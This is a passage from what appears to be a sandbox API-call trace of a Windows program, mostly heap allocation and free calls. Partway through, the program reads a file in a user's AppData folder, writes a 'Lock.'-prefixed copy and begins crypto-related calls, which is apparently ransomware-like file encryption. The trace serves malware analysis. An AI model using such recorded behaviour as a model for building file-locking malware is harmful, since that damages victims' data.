hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0227.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0227.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0227.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0227.811] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0227.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0227.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0227.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0227.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0227.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0227.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0227.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0227.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0227.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0227.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0227.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0227.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0227.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0227.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0227.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0227.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0227.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0227.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0227.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0227.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9778d8 | out: hHeap=0x970000) returned 1 [0227.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0227.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0227.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0227.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0227.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0227.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0227.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f530 | out: hHeap=0x970000) returned 1 [0227.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0227.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0227.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0227.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0227.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0227.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0227.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0227.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0227.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0227.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0227.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0227.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0227.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f350 | out: hHeap=0x970000) returned 1 [0227.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0227.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0227.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0227.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f580 | out: hHeap=0x970000) returned 1 [0227.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0227.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f670 | out: hHeap=0x970000) returned 1 [0227.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0227.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3c8 | out: hHeap=0x970000) returned 1 [0227.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0227.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0227.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0227.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f738 | out: hHeap=0x970000) returned 1 [0227.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0227.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0227.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f800 | out: hHeap=0x970000) returned 1 [0227.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0227.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f4e0 | out: hHeap=0x970000) returned 1 [0227.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0227.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f788 | out: hHeap=0x970000) returned 1 [0227.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0227.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3a0 | out: hHeap=0x970000) returned 1 [0227.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0227.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0227.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0227.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f6e8 | out: hHeap=0x970000) returned 1 [0227.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0227.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0227.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0227.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0227.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0227.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0227.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0227.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0227.815] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0227.815] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0227.815] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0227.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0227.815] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0227.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0227.815] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0227.815] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0227.815] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0227.815] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0227.815] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0227.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0227.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0227.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50470 [0227.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0227.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0227.815] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0227.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0227.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0227.815] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0227.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0227.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x3be0dd0 [0227.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0227.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0227.816] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/DS6Dq4b7eKkPU5JH.mp3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\ds6dq4b7ekkpu5jh.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0227.817] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0227.817] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0227.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a68 [0227.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0227.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50470 | out: hHeap=0x970000) returned 1 [0227.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0227.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0227.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0227.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0227.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0227.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0227.817] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0227.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0227.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0227.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77788 [0227.817] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0227.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0227.818] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0227.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0227.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0227.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0227.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0227.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0227.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0227.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0227.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0227.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0227.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0227.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0227.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x90) returned 0x2e56588 [0227.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0227.818] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming")) returned 0x10 [0227.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0227.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0227.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0227.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x2f04810 [0227.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0227.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0227.820] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/Lock.DS6Dq4b7eKkPU5JH.mp3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\lock.ds6dq4b7ekkpu5jh.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0227.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69c28 [0227.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0227.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0227.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0227.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0227.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0227.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0227.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0227.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0227.821] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0227.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0227.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0227.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0227.821] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0227.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0227.822] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0227.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77ac8 [0227.822] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0227.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0227.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0227.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0227.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0227.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0227.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0227.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0227.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0227.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a88 [0227.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a88 | out: hHeap=0x970000) returned 1 [0227.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0227.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0227.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0227.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0227.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0227.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0xe57020 [0227.823] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0227.823] ReadFile (in: hFile=0x2a0, lpBuffer=0x3be0dd0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0dd0*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0227.827] ReadFile (in: hFile=0x2a0, lpBuffer=0x3be0dd0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0dd0*, lpNumberOfBytesRead=0x8cf4f8*=0x3541, lpOverlapped=0x0) returned 1 [0227.828] ReadFile (in: hFile=0x2a0, lpBuffer=0x3be0dd0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0dd0*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0227.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0227.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0227.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0227.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0227.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x13541) returned 0x2f14818 [0227.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe57020 | out: hHeap=0x970000) returned 1 [0227.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0227.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0227.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0227.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0227.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0227.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0227.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0227.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0227.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x13541) returned 0x2f27d68 [0227.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14818 | out: hHeap=0x970000) returned 1 [0227.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0227.832] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0227.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0227.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0227.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0227.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0227.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0227.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x13541) returned 0x2f14818 [0227.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0227.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14818 | out: hHeap=0x970000) returned 1 [0227.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0227.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0227.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0227.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0227.832] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0227.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0227.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0227.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699e8 [0227.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0227.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0227.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0227.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0227.833] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0227.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0227.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f042a0 [0227.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0227.833] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: 